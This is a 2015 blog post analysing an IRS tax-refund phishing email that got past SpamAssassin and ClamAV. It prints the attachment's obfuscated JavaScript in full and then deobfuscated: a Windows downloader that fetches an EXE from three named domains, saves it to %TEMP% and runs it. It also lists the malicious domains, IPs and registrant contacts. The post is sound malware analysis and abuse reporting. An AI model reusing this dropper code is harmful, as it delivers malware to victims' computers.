Tuesday, September 15, 2015

An IRS tax refund phishing scam illustrates the widespread failure of hosting and antivirus providers' security measures

Scams focused on stealing tax refunds remain highly profitable, despite the fact that they are well known and understood by security professionals and the general public, and have been for years. A variety of distribution methods are used, with the common threads being the use of IRS logos and bureaucratic-sounding language to convince users to click a link, download and execute a file and/or send personally identifying information like a Social Security number. A recent example of one such a scam that I came across is a damning illustration of the failure of online service providers to protect users from obvious and simple malware distribution methods.

In the example I wish to discuss today, the distribution method was a spammed email that on a small ISP's installation of SpamAssassin (note: I am not an admin or employee of this system; I'm a customer) received an X-Spam-Status score of 5.3 after being flagged with the following variables:

X-Spam-Status: No, score=5.3 required=10.0 tests=AM_TRUNCATED,CK_419SIZE,
CK_KARD_SIZE,ENV_FROM_DIFF,ENV_FROM_DIFF0,FROM_SECURITY,HAS_REPLY_TO,
HEADER_FROM_DIFFERENT_DOMAINS,JUNKE_IXHASH,LINK_NR_TOP,MAILPHISH_REPLYTO,
PSTOCK_PART,TO_NOREAL,XPRIO,ZIP_ATTACH shortcircuit=no  
        autolearn=disabled version=3.4.0 

While the default SpamAssassin threshold for marking a message as spam is 5.0, few admins leave this default value. SpamAssassin itself recommends that admins of multiple user mail servers use a threshold of 8 to 10. I don't have this ISP's spamassassin.conf file, and its obviously been customized. My point here isn't to take issue with SpamAssassin, which I have used for many years, but to demonstrate how this message made its way to mailboxes through pretty solid security software despite these being included in the headers:

From: "Internal Revenue Service" <office@irs.gov> 
Reply-To: "Internal Revenue Service" <office@irs.gov>  
Return-Path: <servers@abitindia.com>

Here's another depressing bonus. In addition to SpamAssassin, the recipient mail server had clamav installed. The message had a .ZIP file attachment, and the mail server's clamav install marked it as clean:

X-Virus-Scanned: clamav-milter 0.98.7 at mx1.riseup.net
X-Virus-Status: Clean
The attachment does in fact have a javascript nasty-ware. And clamav is not alone in its failure to pick up the file. According to Virustotal, 31 out of 56 AV platforms failed to detect this file - including Symantec, TrendMicro, Panda, Malwarebytes, Avast and Avira. In defense of these AV heavyweights, the file used a single basic obfuscation function to disguise its purpose - which at the moment is apparently enough to fool these AV packages.

/* var str="5550575E141114141D070D0001000624160D170111144A0A0110";/* var g=eu390753(); */ /* var g=eu154143(); */ function eu740030()
{ return 'nd('; }; function eu678074() { return 'htt'; }; function eu650538() { return '; '; }; /* var g=eu195033(); */ /* var
g=eu990052(); */ function eu712494() { return '"+fr'; }; /* var g=eu488625(); */ /* var g=eu243875(); */ /* var g=eu862948(); */ /*
var g=eu154376(); */ function eu209962() { return 'EMP%"'; }; function eu454344() { return '); x'; }; /* var g=eu421168(); */ function
eu165216() { return 'ell")'; }; /* var g=eu451609(); */ function eu265034() { return '000'; }; /* var g=eu281022(); */ /* var
g=eu562156(); */ /* var g=eu838888(); */ function eu757240() { return '{}'; }; /* var g=eu702000(); */ /* var g=eu954001(); */ /* var
g=eu531084(); */ /* var g=eu119797(); */ /* var g=eu120668(); */ function eu612676() { return ' ca'; }; /* var g=eu542506(); */
function eu760682() { return '; if '; }; /* var g=eu512391(); */ /* var g=eu825797(); */ /* var g=eu168021(); */ /* var g=eu847813();
*/ function eu526626() { return ' > 5'; }; /* var g=eu507959(); */ /* var g=eu606845(); */ /* var g=eu297163(); */ function eu137680()
{ return ' ws '; }; function eu134238() { return 'ar'; }; /* var g=eu368403(); */ /* var g=eu610114(); */ /* var g=eu598843(); */
function eu24094() { return 'var'; }; function eu636770() { return 'cl'; }; function eu437134() { return 'je'; }; function eu3442()
{return 'func'; }; /* var g=eu502971(); */ /* var g=eu841213(); */ function eu299454() { return 'r xo '; }; function eu488764()
{return 'a.wri'; }; function eu192752() { return 'ro'; }; /* var g=eu970337(); */ /* var g=eu548839(); */ /* var g=eu136213(); */
function eu557604() { return ' 0'; }; function eu86050() { return 'r".'; }; function eu413040() { return ' 200'; };
/* var g=eu669196(); */ function eu505974() { return 'eBody'; }; function eu189310() { return 'Envi'; }; function eu736588() {
return 'xo.se'; }; /* var g=eu897527(); */ function eu282244() { return ' var'; }; function eu653980() { return 'try'; }; function
eu722820() { return 'str,'; }; function eu75724() { return 'es-eg'; }; function eu223730() { return 'Char'; }; /* var g=eu979959(); */
function eu709052() { return 'rnd='; }; function eu485322() { return ' x'; }; /* var g=eu341942(); */ /* var g=eu948885(); */ function
eu784776() { return '};'; }; /* var g=eu926393(); */ /* var g=eu901298(); */ function eu691842() {return 'do'; }; /* var g=eu885496();
*/ function eu110144() { return 'i='; }; function eu416482() { return ') {'; }; /* var g=eu120975(); */ function eu798544() { return
'dl(56'; }; function eu58514() { return 'scomm'; }; function eu247824() { return 'd('; }; function eu364852() { return 'ction'; };
function eu302896() { return '= new'; }; function eu285686() { return ' dn ';}; /* var g=eu821728(); */ /* var g=eu842788(); */ /*
var g=eu661571(); */ /* var g=eu363472(); */ function eu216846() { return 'ing'; }; /* var g=eu833123(); */ /* var g=eu103287(); */
function eu178984() { return 's.E'; }; /* var g=eu838741(); */ function eu426808() { return '= new'; }; function eu433692() {
return 'veXOb'; }; function eu330432() { return 'XML'; }; /* var g=eu154291(); */ /* var g=eu305402(); */ function eu27536() {
return ' b ='; }; function eu801986() { return '12'; }; /* var g=eu883666(); */ /* var g=eu679789(); */ /* var g=eu280128(); */
function eu702168() { return 'nt.ph'; }; /* var g=eu205206(); */ /* var g=eu755657(); */ /* var g=eu296601(); */ /* var g=eu994237();
*/ function eu447460() { return '.Stre'; }; /* var g=eu606497(); */ /* var g=eu341165(); */ function eu640212() { return 'ose()'; };
function eu48188() { return 'club'; }; function eu227172() { return 'Code'; }; /* var g=eu586861(); */ function eu230614() {
return '(92)'; }; /* var g=eu248884(); */ /* var g=eu455866(); */ /* var g=eu974554(); */ /* var g=eu716295(); */ /* var g=eu728948();
*/ /* var g=eu134779(); */ function eu585140() { return ' {'; }; function eu361410() { return 'un'; }; function eu564488() {
return 'a.sav'; }; function eu402714() { return 'sta'; }; function eu240940() { return 'ro'; }; function eu220288() {
return '.from'; }; /* var g=eu316494(); */ /* var g=eu344649(); */ function eu347642() { return 'dy'; }; /* var g=eu450983(); */
function eu523184() { return 'ize'; }; function eu89492() { return 'sp'; }; /* var g=eu472250(); */ /* var g=eu927839(); */ /*
var g=eu161789(); */ function eu320106() { return '("'; }; function eu812312() { return '767'; }; function eu567930() { return 'eToF';
}; function eu41304() { return 'st'; }; function eu196194() { return 'nment'; }; /* var g=eu417989(); */ function eu781334() {
return '; '; }; function eu44746() { return 'ling'; }; function eu392388() { return ' 4 '; }; /* var g=eu280394(); */ /*
var g=eu549748(); */ function eu481880() { return '1;'; }; function eu92934() { return 'lit'; }; function eu357968() { return 'e = f';
}; function eu777892() { return '; }'; }; /* var g=eu936640(); */ /* var g=eu812518(); */ function eu34420() { return 'kins'; }; /*
var g=eu798270(); */ /* var g=eu495143(); */ function eu65398() { return 'rtlan'; }; /* var g=eu413662(); */ function eu213404() {
return ')+Str'; }; function eu543836() { return '.p'; }; /* var g=eu942938(); */ function eu771008() { return ' bre'; }; /*
var g=eu586511(); */ /* var g=eu376498(); */ function eu375178() { return ' (xo.'; }; /* var g=eu791942(); */ function eu144564() {
return ' Acti'; }; function eu254708() { return '.rand'; }; function eu536952() { return '= 1'; }; function eu141122() {
return '= new'; }; function eu292570() { return '; '; }; /* var g=eu274913(); */ /* var g=eu365805(); */ /* var g=eu865509(); */
function eu461228() { return 'pen'; }; /* var g=eu411289(); */ /* var g=eu532861(); */ function eu423366() { return 'r xa '; };
function eu309780() { return 've'; }; function eu684958() { return '"+b['; }; /* var g=eu585353(); */ /* var g=eu987364(); */
function eu746914() { return 'cat'; }; /* var g=eu350417(); */ function eu499090() { return 'espo'; }; /* var g=eu139667(); */
function eu406156() { return 'tu'; }; /* var g=eu742334(); */ function eu602350() { return ',1,';}; /* var g=eu606213(); */ /*
var g=eu222109(); */ function eu68840() { return 'ka.n'; }; function eu154890() { return '("WS'; }; function eu368294() {
return '() {'; }; /* var g=eu967067(); */ /* var g=eu434327(); */ /* var g=eu185076(); */ /* var g=eu851480(); */ /*
var g=eu563477(); */ /* var g=eu939168(); */ function eu674632() { return 'ET","'; }; /* var g=eu995946(); */ function eu657422() {
return ' {'; }; /* var g=eu329671(); */ /* var g=eu956885(); */ /* var g=eu974115(); */ /* var g=eu659091(); */ function eu533510() {
return '{ dn '; }; /* var g=eu937903(); */ /* var g=eu140157(); */ /* var g=eu337724(); */ function eu172100() { return 'ar fn'; };
function eu399272() { return 'xo.'; }; function eu175542() {return ' = w'; }; /* var g=eu948434(); */ /* var g=eu951552(); */
function eu474996() { return 'ype '; }; function eu574814() { return 'n,2'; }; function eu598908() { return 'fn'; }; /* var
g=eu237348(); */ /* var g=eu867693(); */ function eu595466() { return 'un('; }; /* var g=eu500120(); */ function eu664306() {
return 'op'; }; function eu151448() { return 'ject'; }; /* var g=eu837452(); */ function eu340758() { return '.onr'; }; /*
var g=eu552763(); */ function eu275360() { return '.ex'; }; /* var g=eu284543(); */ /* var g=eu657020(); */ function eu371736() {
return ' if'; }; function eu354526() { return 'chang'; }; function eu530068() { return '000) '; }; /* var g=eu499927(); */
function eu540394() { return '; xa'; }; function eu79166() { return 'lanti'; }; function eu316664() { return 'ject'; }; /*
var g=eu324828(); */ /* var g=eu106693(); */ /* var g=eu221461(); */ function eu82608() { return 'ers.f'; }; /* var g=eu232361(); */
/* var g=eu247610(); */ function eu203078() { return 'ing'; }; function eu571372() { return 'ile(f'; }; /* var g=eu508170(); */ /*
var g=eu524992(); */ function eu251266() { return 'Math'; }; /* var g=eu444120(); */ /* var g=eu228627(); */ /* var g=eu944619(); */
function eu13768() { return 'dl('; }; /* var g=eu150088(); */ function eu495648() { return 'o.R'; }; /* var g=eu547818(); */
function eu120470() { return 'ngth'; }; /* var g=eu723537(); */ function eu261592() { return '*100'; }; function eu647096() {
return ' }'; }; function eu323548() { return 'MS'; }; /* var g=eu764913(); */ function eu750356() { return 'ch ('; };
function eu103260() { return 'or ('; }; /* var g=eu301263(); */ /* var g=eu856389(); */ function eu729704() { return 'lse'; }; /*
var g=eu394485(); */ /* var g=eu652959(); */ /* var g=eu820332(); */ function eu605792() { return '0);'; }; function eu378620() {
return 're'; }; /* var g=eu299631(); */ function eu234056() { return '+Ma'; }; function eu660864() { return ' xo.'; }; function
eu271918() { return '+"'; }; function eu705() { return 'eval'; }; function eu206520() { return 's("%T'; }; function eu629886() {
return '}; };'; }; /* var g=eu250176(); */ function eu296012() { return 'va'; }; function eu688400() { return 'i]+"/'; }; function
eu333874() { return 'HTTP"'; }; /* var g=eu736808(); */ function eu592024() { return 's.R'; }; /* var g=eu161128(); */ /*
var g=eu511839(); */ function eu791660() { return '(61'; }; function eu715936() { return '+"&'; }; /* var g=eu638536(); */ /*
var g=eu723405(); */ function eu554162() { return 'n ='; }; /* var g=eu886669(); */ /* var g=eu504833(); */ /* var g=eu242011(); */
function eu130796() { return ' v'; }; function eu6884() { return 'tio'; }; /* var g=eu664690(); */ function eu726262() { return ' fa';
}; function eu72282() { return 'et l'; }; /* var g=eu462911(); */ function eu805428() { return '); d'; }; /* var g=eu961461(); */ /*
var g=eu629451(); */ function eu258150() { return 'om()'; }; /* var g=eu680773(); */ /* var g=eu570464(); */ function eu516300() {
return 'f (xa'; }; function eu444018() { return 'ADODB'; }; /* var g=eu645736(); */ function eu681516() { return 'p://'; }; function
eu667748() { return 'en'; }; /* var g=eu300938(); */ /* var g=eu957330(); */ function eu51630() { return '.c'; }; /* var g=eu605933();
*/ /* var g=eu830980(); */ /* var g=eu568139(); */ function eu519742() { return '.s'; }; function eu578256() { return ');'; };
function eu509416() { return ');'; }; function eu168658() { return '; v'; }; function eu430250() { return ' Acti'; }; /*
var g=eu698885(); */ /* var g=eu949928(); */ function eu106702() { return 'var '; }; function eu478438() { return '= '; };
function eu502532() { return 'ns'; }; /* var g=eu408561(); */ function eu313222() { return 'XOb'; }; function eu182426() {
return 'xpa'; }; /* var g=eu115840(); */ /* var g=eu313359(); */ function eu753798() { return 'er) '; }; function eu382062() {
return 'adyS'; }; function eu306338() { return ' Acti'; }; /* var g=eu820304(); */ function eu733146() { return '); '; }; /*
var g=eu348585(); */ function eu588582() { return ' w'; }; /* var g=eu120899(); */ function eu161774() { return 'pt.Sh'; };
function eu774450() { return 'ak'; }; /* var g=eu945050(); */ function eu55072() { return 'om sy'; }; function eu609234() {
return ' }'; }; function eu616118() { return 'tc'; }; function eu561046() { return '; x'; }; /* var g=eu292960(); */ /*
var g=eu180880(); */ /* var g=eu192056(); */ /* var g=eu832125(); */ function eu30978() { return ' "dic'; }; /* var g=eu781191();
*/ function eu148006() { return 'veXOb'; }; /* var g=eu380646(); */ function eu550720() { return 'io'; }; function eu185868() {
return 'nd'; }; function eu351084() { return 'state'; }; /* var g=eu947682(); */ /* var g=eu420108(); */ /* var g=eu797646(); */
/* var g=eu808293(); */ /* var g=eu788790(); */ function eu705610() { return 'p?'; }; function eu409598() { return 's =='; }; /*
var g=eu286588(); */ function eu719378() { return 'id="+'; }; /* var g=eu654127(); */ /* var g=eu353993(); */ /* var g=eu600816();
*/ /* var g=eu187534(); */ function eu117028() { return 'b.le'; }; function eu61956() { return '.sma'; }; function eu289128() {
return '= 0'; }; /* var g=eu590833(); */ /* var g=eu385012(); */ /* var g=eu666069(); */ /* var g=eu175678(); */ function eu468112()
{ return '; '; }; function eu388946() { return '=='; }; function eu492206() { return 'te(x'; }; var g = ''; function eu450902() {
return 'am"'; }; function eu464670() { return '()'; }; /* var g=eu649532(); */ function eu547278() { return 'osit'; }; /* var
g=eu562310(); */ /* var g=eu222069(); */ function eu764124() { return '(dn ='; }; /* var g=eu227792(); */ function eu199636() { return
'Str'; }; function eu344200() { return 'ea'; }; /* var g=eu651793(); */ function eu643654() { return '; };'; }; /* var g=eu562379();
*/ /* var g=eu563133(); */ function eu419924() { return ' va'; }; /* var g=eu202407(); */ function eu698726() { return 'me'; };
function eu99818() { return '); f'; }; function eu113586() { return '0; i<'; }; function eu326990() { return 'XML2.'; }; function
eu10326() { return 'n '; }; /* varg=eu317234(); */ /* var g=eu477220(); */ function eu395830() { return '&& '; }; function
eu278802() { return 'e";'; }; /* var g=eu343859(); */ function eu808870() { return 'l('; }; /* var g=eu927825(); */ function
eu819196() { return ';'; }; /* var g=eu238588(); */ function eu471554() { return 'xa.t'; }; function eu623002() {return 'er'; };
function eu788218() { return ' dl'; }; function eu581698() { return ' try'; }; /* var g=eu316786(); */ function eu633328() {
return ' xa.'; }; function eu619560() { return 'h ('; }; /* var g=eu675038(); */ function eu795102() { return '61); '; }; /*
var g=eu982732(); */ function eu512858() { return ' i'; }; function eu158332() { return 'cri'; }; /* var g=eu350074(); */
function eu244382() { return 'un'; }; /* var g=eu883721(); */ /* var g=eu201317(); */ function eu237498() { return 'th.'; }; /*
var g=eu797567(); */ function eu96376() { return '(" "'; }; function eu127354() { return ') {'; }; /* var g=eu206174(); */ /*
var g=eu150840(); */ /* var g=eu589107(); */ /* var g=eu552644(); */ /* var g=eu801214(); */ /* var g=eu557823(); */ function
eu767566() { return '= 1)'; }; /* var g=eu108702(); */ /* var g=eu459085(); */ function eu37862() { return 'onwre'; }; function
eu17210() { return 'fr)'; }; /* var g=eu978188(); */ function eu440576() { return 'ct("'; }; function eu123912() { return '; i++'; };
function eu743472() { return '); } '; }; /* var g=eu447463(); */ function eu815754() { return '3)'; }; function eu385504() {
return 'tate '; }; /* var g=eu586679(); */ function eu626444() { return ') {'; }; function eu20652() { return ' { '; }; /*
var g=eu855746(); */ /* var g=eu451678(); */ /* var g=eu430071(); */ /* var g=eu849527(); */ /* var g=eu622118(); */ function
eu268476() { return '000)'; }; /* var g=eu601964(); */ /* var g=eu254555(); */ /* var g=eu261686(); */ function eu457786() { return
'a.o'; }; function eu695284() { return 'cu'; }; /* var g=eu974457(); */ /* var g=eu968835(); */ /* var g=eu601355(); */ /*
var g=eu571118(); */ function eu671190() { return '("G'; }; function eu337316() { return '); xo'; }; /* var g=eu493574(); */ /*
var g=eu840048(); */ /* var g=eu333794(); */for (var yy=1; yy<=238; yy++) { g += this['eu'+(yy*3442)](); }; this[eu705()](); */

One round through Einar Lielmanis' JS Beautifier later, and we have this:

function dl(fr) {
var b = "dickinsonwrestlingclub.com syscomm.smartlanka.net les-eglantiers.fr".split(" ");
for (var i = 0; i < b.length; i++) {
var ws = new ActiveXObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
var dn = 0;
var xo = new ActiveXObject("MSXML2.XMLHTTP");
xo.onreadystatechange = function() {
if (xo.readyState == 4 && xo.status == 200) {
var xa = new ActiveXObject("ADODB.Stream");
xa.open();
xa.type = 1;
xa.write(xo.ResponseBody);
if (xa.size > 5000) {
dn = 1;
xa.position = 0;
xa.saveToFile(fn, 2);
try {
ws.Run(fn, 1, 0);
} catch (er) {};
};
xa.close();
};
};
try {
xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + str, false);
xo.send();
} catch (er) {};
if (dn == 1) break;
};
};
dl(6161);
dl(5612);
dl(7673);

The script creates an EXE file in the %TEMP% directory - usually something like C:\Users\UserName\AppData\Local\Temp - that is named some random string, and fills it with a bunch of garbage that it retrieves from one of the three domain names listed: dickinsonwrestlingclub.com, syscomm.smartlanka.net or les-eglantiers.fr.

There are a number of domains and hosts associated with this scam.



Malware domains
Domain IP Host Registrant Contact DNS IPs
dickinsonwrestlingclub.com 72.20.64.58 Consolidated Telcom Perfect Privacy, LLC N/A 72.20.64.11, 72.20.64.12
syscomm.smartlanka.net 69.89.31.73 box273.bluehost.com / Bluehost / Unified Layer Dilhan Seneviratne prabhath247@gmail.com 74.220.195.31, 69.89.16.4
les-eglantiers.fr 76.74.242.190 hp92.hostpapa.com / Peer 1 Network / Cogeco John Huisman / Camping Beau Rivag huisman.huisman@orange.fr 69.90.36.133, 204.15.193.53



Spam domains
Domain IP Host Email Provider Contact DNS IPs
abitindia.com 54.165.102.41 Amazon EC2 Gmail accounts@abitindia.com 50.23.136.229, 50.23.75.96, 162.251.82.118, 184.173.150.57
mail.netspaceindia.com 74.54.133.186 The Planet N/A help@netspaceindia.com 205.251.196.41, 205.251.192.135, 205.251.199.124, 205.251.195.214
netspaceindia.com 104.131.68.147 Digital Ocean N/A help@netspaceindia.com 205.251.196.41, 205.251.192.135, 205.251.199.124, 205.251.195.214



Taking a look at the hosts involved in this scam provides even further disappointment. abitindia.com, whose email is managed by Gmail, is providing the return-path for the spam messages but not the reply-to. Replies, incredibly, go directly to the IRS support email address. The reply-to header is commonly forged so that backscatter goes to some random sucker. In this case, abitindia.com is affiliated with the sender domain netspaceindia.com:

Domain Name: ABITINDIA.COM
Updated Date: 2014-11-24T05:21:07Z
Creation Date: 2006-11-23T19:31:19Z
Registrar Registration Expiration Date: 2015-11-23T19:31:19Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrant Name: Netspaceindia
Registrant Organization: Netspaceindia
Registrant Street: Hall no 3, Wing B, Parshuram apt Above Woodlands Showroom College Road Nashik
Registrant City: Nashik
Registrant State/Province: Maharashtra
Registrant Postal Code: 422005
Registrant Country: IN
Registrant Phone: +91.9975444464
Registrant Email: accounts@abitindia.com
Name Server: dns1.netspaceindia.com
Name Server: dns2.netspaceindia.com
Name Server: dns3.netspaceindia.com
Name Server: dns4.netspaceindia.com


In other words, in many circumstances backscatter recipients are innocent victims. That is not the case here - the sender is managing the backscatter recipient address, likely to keep their mailing lists updated. As such, Google could play a role in putting a stop to this scam - a review of the backscatter would make the relationship between sender and backscatter recipient obvious, and in an ideal world would precipitate the suspension of the Google Apps account for "abitindia.com".

To be fair, Google's responsibility here is minimal - particularly when compared to the role that every other hosting provider plays in this. The Planet and Digital Ocean are providing the infrastructure for the spam campaign, while Bluehost, Cogeco and Consolidated Telcom are providing the infrastructure for hosting the malware. Its likely that the accounts for these providers were created using fraudulent/stolen payment information, or legitimate accounts were compromised. This sort of thing is an everyday occurrence for hosting providers; for providers who do not invest in abuse response, these types of scams can use the same accounts with the same hosting providers for months if not years. When I come across this sort of scam, I do my best to inform the hosting providers involved using the abuse contact information that is required to be associated with IP/DNS registrations, along with enough evidence for the provider to confirm Im not a nut. It is unusual to receive a response and even more unusual to receive a non-automated response. It is just as unusual for hosting provider staff to review their abuse@ contacts, let alone resolve the issues they receive.

Hemming and hawing over the need for state intervention to prevent "cyber-attacks" (vomit) and scams like the ones described here are all over the place. Many of those who support such a view make it a point to justify government intervention because of the incredible sophistication and technical complexity of the scams that plague internet users. However, the overwhelming volume of the scams I have encountered over the course of my career involved well known techniques and software. There is significant room for improvement in security practices with applying what we already know: like how to prevent (or rapidly stop) a 30 year old scam using 20 year old spam techniques to circulate 10 year old malware.

No comments:

Post a Comment